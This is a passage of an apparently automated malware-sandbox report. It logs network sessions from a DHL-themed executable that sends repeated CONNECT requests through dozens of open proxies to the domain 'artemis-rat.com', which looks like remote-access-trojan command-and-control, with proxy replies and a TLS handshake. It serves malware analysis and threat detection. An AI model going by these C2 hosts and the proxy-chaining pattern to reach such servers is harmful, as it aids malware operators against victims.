Mar 9, 2024 13:14:14.838059902 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
600	192.168.2.5	51306	18.166.142.180	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.683799028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
601	192.168.2.5	51734	158.255.215.50	16993	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.689001083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.991905928 CET	339	IN	HTTP/1.1 403 Forbidden Server: squid/4.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5 X-Squid-Error: TCP_RESET 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from proxy.wakoopa.com Via: 1.1 proxy.wakoopa.com (squid/4.7) Connection: keep-alive Data Raw: 72 65 73 65 74 Data Ascii: reset

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
602	192.168.2.5	51777	72.195.34.59	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.718941927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
603	192.168.2.5	51173	41.242.116.150	50003	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.719100952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.825783968 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.868649006 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
604	192.168.2.5	51342	51.158.98.197	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.722111940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.723985910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.724534988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
605	192.168.2.5	51694	38.54.116.9	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.726810932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.132643938 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
606	192.168.2.5	51819	159.65.245.255	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.728636026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.286232948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.989573956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.003155947 CET	442	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:16 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 281 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
607	192.168.2.5	51812	70.166.167.55	57745	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.734371901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
608	192.168.2.5	51775	198.44.255.3	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.736243010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
609	192.168.2.5	51834	92.204.134.38	55425	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.740747929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
610	192.168.2.5	51773	41.111.243.18	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.741342068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.057111979 CET	495	IN	HTTP/1.1 502 Proxy Error Date: Sat, 09 Mar 2024 12:13:24 GMT Server: Apache Content-Length: 348 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 44 4e 53 20 6c 6f 6f 6b 75 70 20 66 61 69 6c 75 72 65 20 66 6f 72 3a 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>DNS lookup failure for: artemis-rat.com</strong></p></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
611	192.168.2.5	51936	104.20.24.214	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.746300936 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.900670052 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
612	192.168.2.5	51871	201.174.239.28	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.749536991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
613	192.168.2.5	51398	34.49.208.221	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.790579081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
614	192.168.2.5	51821	174.77.111.197	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.790901899 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
615	192.168.2.5	51817	72.195.34.58	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.791414022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
616	192.168.2.5	51893	154.205.152.96	9080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.807966948 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:17.017849922 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:18.115350962 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:19.393222094 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:21.984776020 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:27.104886055 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:37.345010996 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
617	192.168.2.5	51719	43.231.22.229	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.808384895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.225425959 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
618	192.168.2.5	51833	72.195.34.41	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.808636904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
619	192.168.2.5	51835	24.249.199.12	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.808681011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
620	192.168.2.5	51756	167.172.86.46	10471	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.808990002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
621	192.168.2.5	51840	174.77.111.198	49547	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.809065104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
622	192.168.2.5	51753	103.13.229.193	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.810223103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.536209106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.724009991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.036513090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
623	192.168.2.5	51337	41.65.236.56	1981	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.810458899 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.825762987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.868627071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
624	192.168.2.5	51887	184.170.249.65	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.810600996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
625	192.168.2.5	51741	94.20.183.172	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.810610056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
626	192.168.2.5	51946	172.67.253.69	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.810725927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.965444088 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
627	192.168.2.5	51885	35.72.118.126	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.811724901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.077734947 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:14 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:15.111816883 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 95 c8 d6 a3 7c 2a 5d 57 16 be f1 d1 2b 0e ac 4c 6e 26 31 2a 80 ff 39 07 ac e3 36 01 e9 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eR\|]W+Ln&196*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:15.378422976 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 26 96 ac 7c 70 1f 71 89 b7 4a f4 ff 5b e0 52 de 90 00 f1 37 ad 05 e1 36 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9&\|pqJ[R76DOWNGRD0000H010Uartemis-rat.com0240309120120Z260309120120Z010Uartemis-rat.com0"0H0LU,m-YLa
